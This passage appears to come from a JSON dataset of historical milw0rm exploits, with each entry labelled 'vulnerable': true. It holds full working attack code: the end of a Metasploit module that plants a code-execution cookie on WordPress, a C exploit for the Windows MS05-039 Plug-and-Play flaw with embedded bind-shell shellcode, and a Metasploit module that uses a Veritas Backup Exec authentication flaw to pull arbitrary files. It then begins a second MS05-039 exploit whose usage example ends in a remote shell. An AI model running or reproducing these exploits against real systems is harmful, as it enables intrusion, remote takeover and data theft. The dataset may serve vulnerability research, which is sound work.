s/\\n//gm;\n\n\n\n        my $data = \"wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;\".\n\n                   \"wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;\".\n\n                   \"cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=$str\".\n\n                   \";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;\".\n\n                   \"wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;\".\n\n                   \"wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;\";\n\n\n\n        my $req =\n\n                \"GET $path HTTP/1.0\\r\\n\".\n\n                \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\\r\\n\".\n\n                \"Host: $vhost:$target_port\\r\\n\".\n\n                \"Pragma: no-cache\\r\\n\".\n\n                \"Accept: */*\\r\\n\".\n\n                \"Cookie: $data\\r\\n\".\n\n                \"\\r\\n\";\n\n\n\n        my $s = Msf::Socket::Tcp->new(\n\n                'PeerAddr'  => $target_host,\n\n                'PeerPort'  => $target_port,\n\n                'LocalPort' => $self->GetVar('CPORT'),\n\n                'SSL'       => $self->GetVar('SSL'),\n\n\n\n          );\n\n\n\n        if ($s->IsError){\n\n                $self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\n                return;\n\n        }\n\n\n\n        $self->PrintLine(\"[*] Sending the malicious WordPress Get request...\");\n\n\n\n        $s->Send($req);\n\n\n\n        my $results = $s->Recv(-1, 20);\n\n        $s->Close();\n\n        $self->PrintLine($results);\n\n\n\n        return;\n\n}\n\n\n\n1;\n\n\n\n# milw0rm.com [2005-08-10]",
770        "vulnerable": true
771    },
772    {
773        "exploit_id": 1146,
774        "content": "/*\n\nWindows 2000 universal exploit for MS05-039\n\n-\\x6d\\x35\\x6c\\x30\\x6e\\x6e\\x79-\n\n*/\n\n\n\n#define WIN32_LEAN_AND_MEAN\n\n\n\n#include <windows.h>\n\n#include <winnetwk.h>\n\n#include <winsock.h>\n\n#include <Rpc.h>\n\n#include <wchar.h>\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n\n\n#pragma comment(lib, \"mpr\")\n\n#pragma comment(lib, \"Rpcrt4\")\n\n\n\nBYTE Data1[0x68] =\n\n{0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,\n\n 0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,\n\n 0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,\n\n 0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,\n\n 0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n 0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00,\n\n 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00,\n\n 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};\n\nstruct DataStruct1\n\n{\n\n       BYTE SomeString[0x30];\n\n       DWORD RESDataType;\n\n       DWORD LFD;\n\n       DWORD SDM1;\n\n       DWORD SDO;\n\n       DWORD SDL;\n\n       DWORD SDM2;\n\n       BYTE  SDA[0x07D0];\n\n       DWORD LRD;\n\n       DWORD MB;\n\n       DWORD DM;\n\n};\n\nstruct RPCBIND\n\n{\n\n       BYTE VerMaj;\n\n       BYTE VerMin;\n\n       BYTE PacketType;\n\n       BYTE PacketFlags;\n\n       DWORD DataRep;\n\n       WORD FragLength;\n\n       WORD AuthLength;\n\n       DWORD CallID;\n\n       WORD MaxXmitFrag;\n\n       WORD MaxRecvFrag;\n\n       DWORD AssocGroup;\n\n       BYTE NumCtxItems;\n\n       WORD ContextID;\n\n       WORD NumTransItems;\n\n       GUID InterfaceUUID;\n\n       WORD InterfaceVerMaj;\n\n       WORD InterfaceVerMin;\n\n       GUID TransferSyntax;\n\n       DWORD SyntaxVer;\n\n};\n\n//from metasploit, before you were born\n\nBYTE BindShell[374]={\"\\xe8\\x56\\x00\\x00\\x00\\x53\\x55\\x56\\x57\\x8b\\x6c\\x24\\x18\\x8b\\x45\\x3c\"\n\n\"\\x8b\\x54\\x05\\x78\\x01\\xea\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\\xe3\\x32\"\n\n\"\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xff\\xfc\\x31\\xc0\\xac\\x38\\xe0\\x74\\x07\"\n\n\"\\xc1\\xcf\\x0d\\x01\\xc7\\xeb\\xf2\\x3b\\x7c\\x24\\x14\\x75\\xe1\\x8b\\x5a\\x24\"\n\n\"\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\\xe8\"\n\n\"\\xeb\\x02\\x31\\xc0\\x5f\\x5e\\x5d\\x5b\\xc2\\x08\\x00\\x5e\\x6a\\x30\\x59\\x64\"\n\n\"\\x8b\\x19\\x8b\\x5b\\x0c\\x8b\\x5b\\x1c\\x8b\\x1b\\x8b\\x5b\\x08\\x53\\x68\\x8e\"\n\n\"\\x4e\\x0e\\xec\\xff\\xd6\\x89\\xc7\\x81\\xec\\x00\\x01\\x00\\x00\\x57\\x56\\x53\"\n\n\"\\x89\\xe5\\xe8\\x27\\x00\\x00\\x00\\x90\\x01\\x00\\x00\\xb6\\x19\\x18\\xe7\\xa4\"\n\n\"\\x19\\x70\\xe9\\xe5\\x49\\x86\\x49\\xa4\\x1a\\x70\\xc7\\xa4\\xad\\x2e\\xe9\\xd9\"\n\n\"\\x09\\xf5\\xad\\xcb\\xed\\xfc\\x3b\\x57\\x53\\x32\\x5f\\x33\\x32\\x00\\x5b\\x8d\"\n\n\"\\x4b\\x20\\x51\\xff\\xd7\\x89\\xdf\\x89\\xc3\\x8d\\x75\\x14\\x6a\\x07\\x59\\x51\"\n\n\"\\x53\\xff\\x34\\x8f\\xff\\x55\\x04\\x59\\x89\\x04\\x8e\\xe2\\xf2\\x2b\\x27\\x54\"\n\n\"\\xff\\x37\\xff\\x55\\x30\\x31\\xc0\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xff\"\n\n\"\\x55\\x2c\\x89\\xc7\\x31\\xdb\\x53\\x53\\x68\\x02\\x00\\x22\\x11\\x89\\xe0\\x6a\"\n\n\"\\x10\\x50\\x57\\xff\\x55\\x24\\x53\\x57\\xff\\x55\\x28\\x53\\x54\\x57\\xff\\x55\"\n\n\"\\x20\\x89\\xc7\\x68\\x43\\x4d\\x44\\x00\\x89\\xe3\\x87\\xfa\\x31\\xc0\\x8d\\x7c\"\n\n\"\\x24\\xac\\x6a\\x15\\x59\\xf3\\xab\\x87\\xfa\\x83\\xec\\x54\\xc6\\x44\\x24\\x10\"\n\n\"\\x44\\x66\\xc7\\x44\\x24\\x3c\\x01\\x01\\x89\\x7c\\x24\\x48\\x89\\x7c\\x24\\x4c\"\n\n\"\\x89\\x7c\\x24\\x50\\x8d\\x44\\x24\\x10\\x54\\x50\\x51\\x51\\x51\\x41\\x51\\x49\"\n\n\"\\x51\\x51\\x53\\x51\\xff\\x75\\x00\\x68\\x72\\xfe\\xb3\\x16\\xff\\x55\\x04\\xff\"\n\n\"\\xd0\\x89\\xe6\\xff\\x75\\x00\\x68\\xad\\xd9\\x05\\xce\\xff\\x55\\x04\\x89\\xc3\"\n\n\"\\x6a\\xff\\xff\\x36\\xff\\xd3\\xff\\x75\\x00\\x68\\x7e\\xd8\\xe2\\x73\\xff\\x55\"\n\n\"\\x04\\x31\\xdb\\x53\\xff\\xd0\"};\n\nBYTE PRPC[0x48] =\n\n{0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,\n\n 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,\n\n 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,\n\n 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,\n\n 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};\n\nstruct RPCFUNC\n\n{\n\n       BYTE VerMaj;\n\n       BYTE VerMin;\n\n       BYTE PacketType;\n\n       BYTE PacketFlags;\n\n       DWORD DataRep;\n\n       WORD FragLength;\n\n       WORD AuthLength;\n\n       DWORD CallID;\n\n       DWORD AllocHint;\n\n       WORD ContextID;\n\n       WORD Opnum;\n\n};\n\nBYTE POP[0x27] =\n\n{0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00,\n\n 0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00,\n\n 0x05,0x08,0x00,0x00,0x41,0x00,0x41};\n\n\n\nint BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)\n\n{\n\n       BYTE rbuf[0x1000];\n\n       DWORD dw;\n\n       struct RPCBIND RPCBind;\n\n\n\n       memcpy(&RPCBind,&PRPC,sizeof(RPCBind));\n\n       UuidFromString(Interface,&RPCBind.InterfaceUUID);\n\n       UuidToString(&RPCBind.InterfaceUUID,&Interface);\n\n       RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);\n\n       RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);\n\n       TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL);\n\n       return 0;\n\n}\n\n\n\nint Attack(HANDLE PipeHandle)\n\n{\n\n       struct RPCFUNC RPCOP;\n\n       int bwritten=0;\n\n       BYTE *LargeBuffer;\n\n       BYTE rbuf[0x100];\n\n       DWORD dw;\n\n       struct DataStruct1 EvilRPC;\n\n\n\n       memcpy(&EvilRPC,&Data1,sizeof(EvilRPC));\n\n       EvilRPC.SDL=0x07C0;\n\n       memset(EvilRPC.SDA,0x90,0x07D0);\n\n       EvilRPC.SDA[76]=0x3e;\n\n       EvilRPC.SDA[77]=0x1e;\n\n       EvilRPC.SDA[78]=0x02;\n\n       EvilRPC.SDA[79]=0x75;\n\n       memset(EvilRPC.SDA+80,0x90,10);\n\n       EvilRPC.SDA[90]=0x90;\n\n       memcpy(EvilRPC.SDA+94,BindShell,374);\n\n       EvilRPC.MB=0x00000004;\n\n       EvilRPC.DM=0x00000000;\n\n       EvilRPC.LFD=0x000007E0;\n\n       EvilRPC.LRD=0x000007E0;\n\n       memcpy(&RPCOP,&POP,sizeof(RPCOP));\n\n       RPCOP.Opnum = 54;\n\n       RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC);\n\n       RPCOP.AllocHint=sizeof(EvilRPC);\n\n       LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC));\n\n       memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC));\n\n       memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP));\n\n       memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC));\n\n       printf(\"Sending payload...\\nThis has to time out... ctrl+c after 5 secs\\ncheck for shell on port 8721\");\n\n       TransactNamedPipe(PipeHandle, LargeBuffer, sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL);\n\n       free(LargeBuffer);\n\n       return 0;\n\n}\n\n\n\n\n\nint main(int argc, char* argv[])\n\n{\n\n       char *server;\n\n       NETRESOURCE nr;\n\n       char unc[MAX_PATH];\n\n       char szPipe[MAX_PATH];\n\n       HANDLE hFile;\n\n\n\n       if (argc < 2)\n\n       {\n\n               printf(\"Usage: %s <host>\\n\", argv[0]);\n\n               return 1;\n\n       }\n\n       server=argv[1];\n\n       _snprintf(unc, sizeof(unc), \"\\\\\\\\%s\\\\pipe\", server);\n\n       unc[sizeof(unc)-1] = 0;\n\n       nr.dwType       = RESOURCETYPE_ANY;\n\n       nr.lpLocalName  = NULL;\n\n       nr.lpRemoteName = unc;\n\n       nr.lpProvider   = NULL;\n\n       WNetAddConnection2(&nr, \"\", \"\", 0);\n\n\n\n       _snprintf(szPipe, sizeof(szPipe), \"\\\\\\\\%s\\\\pipe\\\\browser\",server);\n\n       hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);\n\n\n\n       BindRpcInterface(hFile,\"8d9f4e40-a03d-11ce-8f69-08003e30051b\",\"1.0\");\n\n\n\n       //SendMalformed RPC request\n\n       Attack(hFile);\n\n       return 0;\n\n}\n\n\n\n// milw0rm.com [2005-08-11]",
775        "vulnerable": true
776    },
777    {
778        "exploit_id": 1147,
779        "content": "##\n\n# This file is part of the Metasploit Framework and may be redistributed\n\n# according to the licenses defined in the Authors field below. In the\n\n# case of an unknown or missing license, this file defaults to the same\n\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n\n# version of the Framework can always be obtained from metasploit.com.\n\n##\n\n\n\n##\n\n# Original code written by <CENSORED> and ported to the Framework by HDM\n\n##\n\n\n\npackage Msf::Exploit::backupexec_dump;\n\nuse base \"Msf::Exploit\";\n\nuse strict;\n\nuse Pex::Text;\n\nuse IO::Socket;\n\nuse IO::Select;\n\n\n\nmy $advanced = { };\n\n\n\nmy $info =\n\n  {\n\n\t'Name'  \t=> 'Veritas Backup Exec Windows Remote File Access',\n\n\t'Version'  \t=> '$Revision: 1.3 $',\n\n\t'Authors' \t=> [ 'anonymous' ],\n\n\t'Arch'  \t=> [ ],\n\n\t'OS'    \t=> [ ],\n\n\n\n\t'UserOpts'\t=>\n\n\t  {\n\n\t\t'RHOST' => [1, 'ADDR', 'The target IP address'],\n\n\t\t'RPORT' => [1, 'PORT', 'The target NDMP port', 10000],\n\n\t\t'RPATH' => [0, 'DATA', 'The remote file path to obtain'],\n\n\t\t\n\n\t\t'LHOST' => [1, 'ADDR', 'The local IP address', '0.0.0.0'],\n\n\t\t'LPORT' => [1, 'PORT', 'The local listner port', 44444],\n\n\t\t'LPATH' => [0, 'DATA', 'The local backup file path'],\n\n\t  },\n\n\n\n\t'Description'  => Pex::Text::Freeform(qq{\n\n\tThis module abuses a logic flaw in the Backup Exec Windows Agent to download\n\narbitrary files from the system. This flaw was found by someone who wishes to\n\nremain anonymous and affects all known versions of the Backup Exec Windows Agent. The \n\noutput file is in 'MTF' format, which can be extracted by the 'NTKBUp' program \n\nlisted in the references section.\n\n}),\n\n\n\n\t'Refs' =>\n\n\t  [\n\n\t  \t['BID', '14551'],\n\n\t\t['URL', 'http://www.fpns.net/willy/msbksrc.lzh'],\n\n\t\t# ['URL', 'http://metasploit.com/tools/msbksrc.tar.gz'],\n\n\t  ],\n\n\n\n\t'DefaultTarget' => 0,\n\n\t'Targets' =>\n\n\t  [\n\n\t\t['Veritas Remote File Access'],\n\n\t  ],\n\n\n\n\t'Keys' => ['veritas'],\n\n  };\n\n\n\nsub new {\n\n\tmy $class = shift;\n\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\n\treturn($self);\n\n}\n\n\n\nsub Check {\n\n\tmy $self        = shift;\n\n\tmy $remote_host = $self->GetVar('RHOST');\n\n\tmy $remote_port = $self->GetVar('RPORT');\n\n\n\n\tmy $s = Msf::Socket::Tcp->new(\n\n\t\t'PeerAddr'  => $remote_host,\n\n\t\t'PeerPort'  => $remote_port,\n\n\t\t'SSL'       => $self->GetVar('SSL'),\n\n\t  );\n\n\n\n\tif ( $s->IsError ) {\n\n\t\t$self->PrintLine( '[*] Error connecting to Veritas agent: ' . $s->GetError );\n\n\t\treturn $self->CheckCode('Connect');\n\n\t}\n\n\n\n\tmy $res;\n\n\tmy $pkt;\n\n\t\n\n\t$res = $self->AgentRead($s);\n\n\tif (! $res) {\n\n\t\t$self->PrintLine('[*] Did not receive greeting from the agent');\n\n\t\t$s->Close;\n\n\t\treturn $self->CheckCode('Unknown');\n\n\t}\n\n\n\n\tmy $username = \"root\";\n\n\tmy $password = \"\\xb4\\xb8\\x0f\\x26\\x20\\x5c\\x42\\x34\\x03\\xfc\\xae\\xee\\x8f\\x91\\x3d\\x6f\"; \n\n\n\n\t# Create the CONNECT_CLIENT_AUTH request\n\n\t$pkt =\n\n\t  pack('N', 1).\n\n\t  pack('N', time()).\n\n\t  pack('N', 0).\n\n\t  pack('N', 0x0901).\n\n\t  pack('N', 0).\n\n\t  pack('N', 0).\n\n\t  pack('N', 2).\n\n\t  pack('N', length($username)).\n\n\t  $username.\n\n\t  $password;\n\n\n\n\t$self->PrintLine( \"[*] Sending magic authentication request...\");\n\n\t\n\n\t$self->AgentSend($s, $pkt);\n\n\t$res = $self->AgentRead($s);\n\n\t$s->Close;\n\n\t\n\n\tif (! $res) {\n\n\t\t$self->PrintLine('[*] Did not receive authentication response');\n\n\t\treturn $self->CheckCode('Safe');\t\n\n\t}\n\n\n\n\tmy @words = unpack('N*', $res);\n\n\t\n\n\tif (\n\n\t\t$words[2] == 1 && \n\n\t\t$words[3] == 0x0901 &&\n\n\t \t$words[5] == 0 &&\n\n\t  \t$words[6] == 0\n\n\t   ) {\n\n\t\t$self->PrintLine('[*] This system appears to be vulnerable');\n\n\t\treturn $self->CheckCode('Appears');\n\n\t}\n\n\t\n\n\t$self->PrintLine('[*] This system does not appear to be vulnerable');\n\n\treturn $self->CheckCode('Safe');\n\n}\n\n\n\nsub Exploit {\n\n\tmy $self        = shift;\n\n\tmy $remote_host = $self->GetVar('RHOST');\n\n\tmy $remote_port = $self->GetVar('RPORT');\n\n\tmy $remote_path = $self->GetVar('RPATH');\n\n\n\n\tmy $local_host  = $self->GetVar('LHOST');\n\n\tmy $local_port  = $self->GetVar('LPORT');\n\n\tmy $local_path  = $self->GetVar('LPATH');\n\n\t\n\n\t\n\n\tif (! $local_path) {\n\n\t\t$self->PrintLine(\"[*] Please specify a local file name for the LPATH option\");\n\n\t\treturn;\n\n\t}\n\n\n\n\tif (! $remote_path) {\n\n\t\t$self->PrintLine(\"[*] Please specify a remote file path for the RPATH option\");\n\n\t\treturn;\n\n\t}\n\n\t\t\n\n\t$self->PrintLine( \"[*] Attempting to retrieve $remote_path...\");\n\n\n\n\tmy $s = Msf::Socket::Tcp->new(\n\n\t\t'PeerAddr'  => $remote_host,\n\n\t\t'PeerPort'  => $remote_port,\n\n\t\t'SSL'       => $self->GetVar('SSL'),\n\n\t  );\n\n\n\n\tif ( $s->IsError ) {\n\n\t\t$self->PrintLine( '[*] Error connecting to Veritas agent: ' . $s->GetError );\n\n\t\treturn;\n\n\t}\n\n\n\n\tmy $res;\n\n\tmy $pkt;\n\n\t\n\n\t$res = $self->AgentRead($s);\n\n\tif (! $res) {\n\n\t\t$self->PrintLine('[*] Did not receive greeting from the agent');\n\n\t\t$s->Close;\n\n\t\treturn;\n\n\t}\n\n\n\n\tmy $username = \"root\";\n\n\tmy $password = \"\\xb4\\xb8\\x0f\\x26\\x20\\x5c\\x42\\x34\\x03\\xfc\\xae\\xee\\x8f\\x91\\x3d\\x6f\"; \n\n\n\n\t# Create the CONNECT_CLIENT_AUTH request\n\n\t$pkt =\n\n\t  pack('N', 1).\n\n\t  pack('N', time()).\n\n\t  pack('N', 0).\n\n\t  pack('N', 0x0901).\n\n\t  pack('N', 0).\n\n\t  pack('N', 0).\n\n\t  pack('N', 2).\n\n\t  pack('N', length($username)).\n\n\t  $username.\n\n\t  $password;\n\n\n\n\t$self->PrintLine( \"[*] Sending magic authentication request...\");\n\n\t\n\n\t$self->AgentSend($s, $pkt);\n\n\t$res = $self->AgentRead($s);\n\n\tif (! $res) {\n\n\t\t$self->PrintLine('[*] Did not receive authentication response');\n\n\t\treturn;\n\n\t}\n\n\n\n\t$self->PrintLine(\"[*] Starting the data connection listener on $local_port...\");\n\n\tmy $l = IO::Socket::INET->new\n\n\t  (\n\n\t\t'LocalPort' => $local_port,\n\n\t\t'Proto'     => 'tcp',\n\n\t\t'ReuseAddr' => 1,\n\n\t\t'Listen'    => 5,\n\n\t\t'Blocking'  => 0,\n\n\t  );\n\n\t\n\n\tif (! $l) {\n\n\t\t$self->PrintLine(\"[*] Failed to start the listener: $!\");\n\n\t\treturn;\n\n\t}\n\n\t\n\n\tmy $sel = IO::Select->new($l);\n\n\t\n\n\tif ($local_host eq \"0.0.0.0\") {\n\n\t\t$local_host = $s->Socket->sockhost;\n\n\t}\n\n\t\n\n\t# Create the DATA_CONNECT request\n\n\t$pkt =\n\n\t\tpack('NNNNNNN',\n\n\t\t\t3,\n\n\t\t\t0,\n\n\t\t\t0,\n\n\t\t\t0x040a,\n\n\t\t\t0,\n\n\t\t\t0,\n\n\t\t\t1\n\n\t\t).\n\n\t\tgethostbyname($local_host).\n\n\t\tpack('N', $local_port);\n\n\t\t\n\n\t$self->PrintLine(\"[*] Directing the server to $local_host:$local_port...\");\n\n\t\n\n\t$self->AgentSend($s, $pkt);\n\n\t$res = $self->AgentRead($s);\n\n\tif (! $res) {\n\n\t\t$self->PrintLine('[*] Did not receive data connect response');\n\n\t\treturn;\n\n\t}\n\n\n\n\t$self->PrintLine(\"[*] Waiting 15 seconds for the agent to connect...\");\n\n\tmy @rdy = $sel->can_read(15);\n\n\tif (! @rdy) {\n\n\t\t$self->PrintLine(\"[*] No connection received from the agent :-(\");\n\n\t\treturn;\n\n\t}\n\n\t\n\n\tmy $cli = $l->accept();\n\n\tif (! $cli) {\n\n\t\t$self->PrintLine(\"[*] Encountered an error accepting the connection: $!\");\n\n\t\treturn;\n\n\t}\n\n\t\n\n\tmy $d = Msf::Socket::Tcp->new_from_socket($cli);\n\n\t\n\n\t$self->PrintLine(\"[*] Connection received from \".$d->PeerAddr.\" :-)\");\n\n\t\n\n\t# Create the MOVER_SET_RECORD_SIZE request\n\n\t$pkt= \n\n\t\tpack('NNNNNNN',\n\n\t\t\t4,\n\n\t\t\t0,\n\n\t\t\t0,\n\n\t\t\t0x0a08,\n\n\t\t\t0,\n\n\t\t\t0,\n\n\t\t\t0x8000,\n\n\t\t);\n\n\t\t\n\n\t$self->AgentSend($s, $pkt);\n\n\t$res = $self->AgentRead($s);\n\n\tif (! $res) {\n\n\t\t$self->PrintLine('[*] Did not receive mover set response');\n\n\t\treturn;\n\n\t}\n\n\n\n\t# The environment needed to perform the actual backup\n\n\tmy %define_env =\n\n\t(\n\n\t\t'USERNAME'                => '',\n\n\t\t'BU_EXCLUDE_ACTIVE_FILES' => \"0\",\n\n\t\t'FILESYSTEM'              => \"\\\"\\\\\\\\$remote_host\\\\$remote_path\\\",v0,t0,l0,n0,f0\",\n\n\t);\n\n\n\n\t# Create the DATA_START_BACKUP request\n\n\t$pkt =\n\n\t\tpack('NNNNNNN',\n\n\t\t\t5,\n\n\t\t\t0,\n\n\t\t\t0,\n\n\t\t\t0x0401,\n\n\t\t\t0,\n\n\t\t\t0,\n\n\t\t\t4,\n\n\t\t).\n\n\t\t\"dump\".\n\n\t\tpack(\"N\", scalar(keys %define_env));\n\n\t\n\n\tforeach my $var (keys %define_env) {\n\n\t\t\n\n\t\t$pkt .= pack(\"N\", length($var));\n\n\t\t$pkt .= $var;\n\n\t\tif (length($var) % 4) {\n\n\t\t\t$pkt .= \"\\x00\" x (4 - (length($var) % 4));\n\n\t\t}\n\n\t\t\n\n\t\t$pkt .= pack(\"N\", length($define_env{$var}));\n\n\t\t$pkt .= $define_env{$var};\n\n\t\tif (length($define_env{$var}) % 4) {\n\n\t\t\t$pkt .= \"\\x00\" x (4 - (length($define_env{$var}) % 4));\n\n\t\t}\n\n\t}\t\n\n\n\n\tsubstr($pkt, -1, 1) = \"\\x01\";\n\n\t\n\n\t$self->AgentSend($s, $pkt);\n\n\t$res = $self->AgentRead($s);\n\n\tif (! $res) {\n\n\t\t$self->PrintLine('[*] Did not receive backup start response');\n\n\t\treturn;\n\n\t}\n\n\n\n\t# Create the GET_ENV request\n\n\t$pkt =\n\n\t\tpack('NNNNNN',\n\n\t\t\t5,\n\n\t\t\t0,\n\n\t\t\t0,\n\n\t\t\t0x4004,\n\n\t\t\t0,\n\n\t\t\t0,\n\n\t\t);\n\n\n\n\t$self->AgentSend($s, $pkt);\n\n\t$res = $self->AgentRead($s);\n\n\tif (! $res) {\n\n\t\t$self->PrintLine('[*] Did not receive get env response');\n\n\t\treturn;\n\n\t}\n\n\n\n\tif (! open(TMP, \">\". $local_path)) {\n\n\t\t$self->PrintLine(\"[*] Could not open local file for writing: $!\");\n\n\t\treturn;\n\n\t}\n\n\t\n\n\tmy $data;\n\n\tdo \n\n\t{\n\n\t\t$data = $d->Recv(524288, 10);\n\n\t\tif ($data) {\n\n\t\t\t$self->PrintLine(\"[*] Obtained \".length($data).\" bytes from the agent\");\n\n\t\t\tprint TMP $data;\n\n\t\t}\n\n\t\telse {\n\n\t\t\t$self->PrintLine(\"[*] Reached the end of the backup data\");\n\n\t\t}\n\n\t\t\n\n\t} while ($data);\n\n\tclose(TMP);\n\n\t\t\t\n\n\treturn;\n\n};\n\n\n\nsub AgentRead {\n\n\tmy $self = shift;\n\n\tmy $sock = shift;\n\n\tmy $rlen = $sock->Recv(4, 10);\n\n\treturn if ! $rlen;\n\n\t\n\n\tmy $plen = unpack('N', $rlen);\n\n\treturn if ! $plen;\n\n\t\n\n\tmy $data = $sock->Recv($plen & 0x7fffffff, 10);\n\n\treturn $data;\n\n}\n\n\n\nsub AgentSend {\n\n\tmy $self = shift;\n\n\tmy $sock = shift;\n\n\tmy $data = shift;\n\n\treturn if ! $data;\n\n\treturn $sock->Send(pack('N', 0x80000000 + length($data)) . $data);\n\n}\n\n\n\n1;\n\n\n\n# milw0rm.com [2005-08-11]",
780        "vulnerable": true
781    },
782    {
783        "exploit_id": 1149,
784        "content": "/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2\n\n *\n\n * Copyright (c) 2005 houseofdabus.\n\n *\n\n * (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n\n * Universal Exploit + no crash shellcode\n\n *\n\n *\n\n *\n\n *\n\n *                 .::[ houseofdabus ]::.\n\n *\n\n *\n\n *\n\n * ---------------------------------------------------------------------\n\n * Description:\n\n *    A remote code execution and local elevation of privilege\n\n *    vulnerability exists in Plug and Play that could allow an\n\n *    attacker who successfully exploited this vulnerability to take\n\n *    complete control of the affected system.\n\n *\n\n *    This is a remote code execution and local privilege elevation\n\n *    vulnerability. On Windows 2000, an anonymous attacker could\n\n *    remotely try to exploit this vulnerability.\n\n *\n\n *    On Windows XP Service Pack 1, only an authenticated user could\n\n *    remotely try to exploit this vulnerability.\n\n *    On Window XP Service Pack 2 and Windows Server 2003, only an\n\n *    administrator can remotely access the affected component.\n\n *    Therefore, on Windows XP Service Pack 2 and Windows Server 2003,\n\n *    this is strictly a local privilege elevation vulnerability.\n\n *    An anonymous user cannot remotely attempt to exploit this\n\n *    vulnerability on Windows XP Service Pack 2 and Windows\n\n *    Server 2003.\n\n *\n\n * ---------------------------------------------------------------------\n\n * Solution:\n\n *    http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx\n\n *\n\n * ---------------------------------------------------------------------\n\n * Systems Affected:\n\n *    - Windows Server 2003, SP1\n\n *    - Windows XP SP1, SP2\n\n *    - Windows 2000 SP4\n\n *\n\n * ---------------------------------------------------------------------\n\n * Tested on:\n\n *    - Windows 2000 SP4\n\n *\n\n * ---------------------------------------------------------------------\n\n * Compile:\n\n *\n\n * Win32/VC++  : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\n\n * Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\n\n * Linux       : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\n\n *\n\n * ---------------------------------------------------------------------\n\n * Example:\n\n *\n\n * C:\\>HOD-ms05039-pnp-expl 192.168.0.1 7777\n\n *\n\n * [*] connecting to 192.168.0.22:445...ok\n\n * [*] null session...ok\n\n * [*] bind pipe...ok\n\n * [*] sending crafted packet...ok\n\n * [*] check your shell on 192.168.0.1:7777\n\n * Ctrl+C\n\n *\n\n * C:\\>nc 192.168.0.1 7777\n\n *\n\n * Microsoft Windows 2000 [Version 5.00.2195]\n\n * (C) Copyright 1985-2000 Microsoft Corp.\n\n *\n\n * C:\\WINNT\\system32>\n\n *\n\n * ---------------------------------------------------------------------\n\n *\n\n * This is provided as proof-of-concept code only for educational\n\n * purposes and testing by authorized individuals with permission\n\n * to do so.\n\n *\n\n */\n\n\n\n/* #define _WIN32 */\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n\n\n#ifdef _WIN32\n\n#include <winsock2.h>\n\n#pragma comment(lib, \"ws2_32\")\n\n#else\n\n#include <sys/types.h>\n\n#include <netinet/in.h>\n\n#include <sys/socket.h>\n\n#include <netdb.h>\n\n#endif\n\n\n\n\n\nunsigned char SMB_Negotiate[] 